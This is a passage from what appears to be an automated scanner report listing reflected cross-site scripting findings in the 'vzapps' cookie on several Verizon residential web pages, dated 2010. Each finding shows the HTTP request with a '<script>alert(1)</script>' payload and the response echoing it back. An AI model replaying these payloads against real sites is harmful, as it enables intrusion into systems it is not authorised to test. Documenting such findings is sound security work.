Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXe64e0'><script>alert(1)</script>02959857add; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76414
Expires: Sat, 20 Nov 2010 02:03:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:03:58 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:03:58 GMT; path=/
Set-Cookie: ContextInfo_State=TXe64e0'><script>alert(1)</script>02959857add; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:58 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE64E0'><SCRIPT>ALERT(1)</SCRIPT>02959857ADD ' />
...[SNIP]...

1.89. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 121bc<script>alert(1)</script>dc34eddc5d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX121bc<script>alert(1)</script>dc34eddc5d; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77950
Expires: Sat, 20 Nov 2010 02:03:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:03:58 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:03:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX121bc<script>alert(1)</script>dc34eddc5d; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:58 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX121BC<SCRIPT>ALERT(1)</SCRIPT>DC34EDDC5D </DIV>
...[SNIP]...

1.90. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e60c3'><script>alert(1)</script>cd74e2803b2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXe60c3'><script>alert(1)</script>cd74e2803b2; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71898
Expires: Sat, 20 Nov 2010 02:11:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:11:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe60c3'><script>alert(1)</script>cd74e2803b2; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE60C3'><SCRIPT>ALERT(1)</SCRIPT>CD74E2803B2 ' />
...[SNIP]...

1.91. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload fa1de<script>alert(1)</script>64aa99f0d43 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXfa1de<script>alert(1)</script>64aa99f0d43; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71894
Expires: Sat, 20 Nov 2010 02:11:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:11:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXfa1de<script>alert(1)</script>64aa99f0d43; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXFA1DE<SCRIPT>ALERT(1)</SCRIPT>64AA99F0D43 </DIV>
...[SNIP]...

1.92. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b6379'><script>alert(1)</script>c7fa140a027 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXb6379'><script>alert(1)</script>c7fa140a027; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71903
Expires: Sat, 20 Nov 2010 02:13:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:13:08 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXb6379'><script>alert(1)</script>c7fa140a027; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB6379'><SCRIPT>ALERT(1)</SCRIPT>C7FA140A027 ' />
...[SNIP]...

1.93. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6e3f5<script>alert(1)</script>2a57a1a74e5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX6e3f5<script>alert(1)</script>2a57a1a74e5; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71899
Expires: Sat, 20 Nov 2010 02:13:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:13:10 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6e3f5<script>alert(1)</script>2a57a1a74e5; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6E3F5<SCRIPT>ALERT(1)</SCRIPT>2A57A1A74E5 </DIV>
...[SNIP]...

1.94. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload edaca'><script>alert(1)</script>b8648eeae87 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXedaca'><script>alert(1)</script>b8648eeae87; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64488
Expires: Sat, 20 Nov 2010 02:12:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXedaca'><script>alert(1)</script>b8648eeae87; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXEDACA'><SCRIPT>ALERT(1)</SCRIPT>B8648EEAE87 ' />
...[SNIP]...

1.95. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1739b'><script>alert(1)</script>434d128ffee was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX1739b'><script>alert(1)</script>434d128ffee; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92742
Expires: Sat, 20 Nov 2010 02:12:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1739b'><script>alert(1)</script>434d128ffee; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Features & Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1739B'><SCRIPT>ALERT(1)</SCRIPT>434D128FFEE ' />
...[SNIP]...

1.96. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 62570<script>alert(1)</script>87eb268e430 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX62570<script>alert(1)</script>87eb268e430; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92738
Expires: Sat, 20 Nov 2010 02:12:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX62570<script>alert(1)</script>87eb268e430; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Features & Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX62570<SCRIPT>ALERT(1)</SCRIPT>87EB268E430 </DIV>
...[SNIP]...

1.97. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5cb38'><script>alert(1)</script>20fbdf6b466 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
